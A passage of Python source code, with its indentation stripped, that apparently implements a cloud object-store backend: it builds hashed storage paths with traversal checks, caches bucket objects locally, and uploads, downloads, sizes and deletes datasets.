if os.path.islink(path):
continue
umask_fix_perms(path, self.config.umask, 0o666, self.config.gid)
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None,
obj_dir=False, **kwargs):
# extra_dir should never be constructed from provided data but just
# make sure there are no shenannigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name:
if not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
# alt_name can contain parent directory references, but S3 will not
# follow them, so if they are valid we normalize them out
alt_name = os.path.normpath(alt_name)
rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj)))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# for JOB_WORK directory
if obj_dir:
rel_path = os.path.join(rel_path, str(self._get_object_id(obj)))
if base_dir:
base = self.extra_dirs.get(base_dir)
return os.path.join(base, rel_path)
# S3 folders are marked by having trailing '/' so add it now
rel_path = f'{rel_path}/'
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else f"dataset_{self._get_object_id(obj)}.dat")
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
def _get_size_in_cloud(self, rel_path):
try:
obj = self.bucket.objects.get(rel_path)
if obj:
return obj.size
except Exception:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.objects.list(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
exists = True if self.bucket.objects.get(rel_path) is not None else False
except Exception:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
if rel_path[0] == '/':
raise
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.objects.get(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
ret_code = subprocess.call(f"axel -a -n {ncores} '{url}'")
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
with open(self._get_cache_path(rel_path), "w+") as downloaded_file_handle:
key.save_content(downloaded_file_handle)
return True
except Exception:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
"""
Push the file pointed to by ``rel_path`` to the object store naming the key
``rel_path``. If ``source_file`` is provided, push that file instead while
still using ``rel_path`` as the key name.
If ``from_string`` is provided, set contents of the file to the value of
the string.
"""
try:
source_file = source_file if source_file else self._get_cache_path(rel_path)
if os.path.exists(source_file):
if os.path.getsize(source_file) == 0 and (self.bucket.objects.get(rel_path) is not None):
log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file,
rel_path)
return True
if from_string:
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
created_obj.upload(source_file)
else:
self.bucket.objects.get(rel_path).upload(source_file)
log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
else:
start_time = datetime.now()
log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file,
os.path.getsize(source_file), rel_path)
self.transfer_progress = 0 # Reset transfer progress counter
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
created_obj.upload_from_file(source_file)
else:
self.bucket.objects.get(rel_path).upload_from_file(source_file)
end_time = datetime.now()
log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
return True
else:
log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
rel_path, source_file)
except Exception:
log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_cloud(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_cloud(rel_path))
return False
def _exists(self, obj, **kwargs):
in_cache = False
rel_path = self._construct_path(obj, **kwargs)
# Check cache
if self._in_cache(rel_path):
in_cache = True
# Check cloud
in_cloud = self._key_exists(rel_path)
# log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
# dir_only does not get synced so shortcut the decision
dir_only = kwargs.get('dir_only', False)
base_dir = kwargs.get('base_dir', None)
if dir_only:
if in_cache or in_cloud:
return True
# for JOB_WORK directory
elif base_dir:
if not os.path.exists(rel_path):
os.makedirs(rel_path)
return True
else:
return False
# TODO: Sync should probably not be done here. Add this to an async upload stack?
if in_cache and not in_cloud:
self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
return True
elif in_cloud:
return True
else:
return False
def _create(self, obj, **kwargs):
if not self._exists(obj, **kwargs):
# Pull out locally used fields
extra_dir = kwargs.get('extra_dir', None)
extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
dir_only = kwargs.get('dir_only', False)
alt_name = kwargs.get('alt_name', None)
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj)))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# Create given directory in cache
cache_dir = os.path.join(self.staging_path, rel_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else f"dataset_{self._get_object_id(obj)}.dat")
open(os.path.join(self.staging_path, rel_path), 'w').close()
self._push_to_os(rel_path, from_string='')
def _empty(self, obj, **kwargs):
if self._exists(obj, **kwargs):
return bool(self._size(obj, **kwargs) > 0)
else:
raise ObjectNotFound('objectstore.empty, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def _size(self, obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
if self._in_cache(rel_path):
try:
return os.path.getsize(self._get_cache_path(rel_path))
except OSError as ex:
log.info("Could not get size of file '%s' in local cache, will try cloud. Error: %s", rel_path, ex)
elif self._exists(obj, **kwargs):
return self._get_size_in_cloud(rel_path)
log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
return 0
def _delete(self, obj, entire_dir=False, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
try:
# Remove temparory data in JOB_WORK directory
if base_dir and dir_only and obj_dir:
shutil.rmtree(os.path.abspath(rel_path))
return True
# For the case of extra_files, because we don't have a reference to
# individual files/keys we need to remove the entire directory structure
# with all the files in it. This is easy for the local file system,
# but requires iterating through each individual key in S3 and deleing it.
if entire_dir and extra_dir:
shutil.rmtree(self._get_cache_path(rel_path), ignore_errors=True)
results = self.bucket.objects.list(prefix=rel_path)
for key in results:
log.debug("Deleting key %s", key.name)
key.delete()
return True
else:
# Delete from cache first
unlink(self._get_cache_path(rel_path), ignore_errors=True)
# Delete from S3 as well
if self._key_exists(rel_path):
key = self.bucket.objects.get(rel_path)
log.debug("Deleting key %s", key.name)
key.delete()
return True
except Exception:
log.exception("Could not delete key '%s' from cloud", rel_path)
except OSError:
log.exception('%s delete error', self._get_filename(obj, **kwargs))
return False
def _get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path))
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def _get_filename(self, obj, **kwargs):
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
rel_path = self._construct_path(obj, **kwargs)
# for JOB_WORK directory
if base_dir and dir_only and obj_dir:
return os.path.abspath(rel_path)
cache_path = self._get_cache_path(rel_path)
# S3 does not recognize directories as files so cannot check if those exist.
# So, if checking dir only, ensure given dir exists in cache and return
# the expected cache path.
# dir_only = kwargs.get('dir_only', False)
# if dir_only:
# if not os.path.exists(cache_path):
# os.makedirs(cache_path)
# return cache_path
# Check if the file exists in the cache first
if self._in_cache(rel_path):
return cache_path
# Check if the file exists in persistent storage and, if it does, pull it into cache
elif self._exists(obj, **kwargs):
if dir_only: # Directories do not get pulled into cache
return cache_path
else:
if self._pull_into_cache(rel_path):
return cache_path
# For the case of retrieving a directory only, return the expected path
# even if it does not exist.
# if dir_only:
# return cache_path
raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s'
% (str(obj), str(kwargs)))
# return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def _update_from_file(self, obj, file_name=None, create=False, **kwargs):
if create:
self._create(obj, **kwargs)
if self._exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Chose whether to use the dataset file itself or an alternate file
if file_name:
source_file = os.path.abspath(file_name)
# Copy into cache
cache_file = self._get_cache_path(rel_path)
try:
if source_file != cache_file:
# FIXME? Should this be a `move`?
shutil.copy2(source_file, cache_file)
self._fix_permissions(cache_file)
except OSError:
log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
else:
source_file = self._get_cache_path(rel_path)
# Update the file on cloud
self._push_to_os(rel_path, source_file)
else:
raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def _get_object_url(self, obj, **kwargs):
if self._exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = self.bucket.objects.get(rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except Exception:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
def _get_store_usage_percent(self):
return 0.0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.